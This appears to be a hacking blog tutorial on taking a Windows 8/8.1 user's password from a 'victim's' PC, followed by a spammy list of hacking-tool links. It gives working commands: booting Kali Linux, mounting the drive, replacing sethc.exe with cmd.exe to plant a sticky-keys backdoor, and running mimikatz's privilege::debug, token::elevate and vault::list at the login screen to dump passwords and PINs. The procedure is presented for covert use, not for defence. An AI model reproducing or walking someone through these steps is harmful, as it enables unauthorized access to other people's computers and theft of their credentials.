Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)

Related news


  1. Nsa Hack Tools
  2. World No 1 Hacker Software
  3. Tools 4 Hack
  4. Pentest Tools Open Source
  5. Game Hacking
  6. Hacks And Tools
  7. Hack Tools
  8. Pentest Reporting Tools
  9. Pentest Tools Windows
  10. Best Hacking Tools 2020
  11. Install Pentest Tools Ubuntu
  12. Pentest Tools Alternative
  13. How To Install Pentest Tools In Ubuntu
  14. New Hack Tools
  15. Hacking Tools Download
  16. World No 1 Hacker Software
  17. Tools Used For Hacking
  18. Hack Website Online Tool
  19. Tools Used For Hacking
  20. Pentest Tools Find Subdomains
  21. Pentest Recon Tools
  22. Hack Tools For Games
  23. Black Hat Hacker Tools
  24. Hacker Tools For Windows
  25. Ethical Hacker Tools
  26. Termux Hacking Tools 2019
  27. Pentest Tools Port Scanner
  28. Hacker Tools List
  29. Github Hacking Tools
  30. Hacking Tools 2019
  31. Hacker Tools Free Download
  32. Hacking Tools Download
  33. Pentest Tools Download
  34. Github Hacking Tools
  35. Hacker Tools Mac
  36. Pentest Tools Subdomain
  37. Beginner Hacker Tools
  38. Pentest Tools
  39. Hacking Tools For Games
  40. Pentest Tools Nmap
  41. Hack Tools For Mac
  42. Hacker Tools 2019
  43. Hack Tools Download
  44. Install Pentest Tools Ubuntu
  45. Black Hat Hacker Tools
  46. Hacker Tools Software
  47. Black Hat Hacker Tools
  48. Hacking App
  49. Pentest Tools Android
  50. Physical Pentest Tools
  51. Pentest Tools Tcp Port Scanner
  52. Install Pentest Tools Ubuntu
  53. Hacking Tools For Kali Linux

No comments:

Post a Comment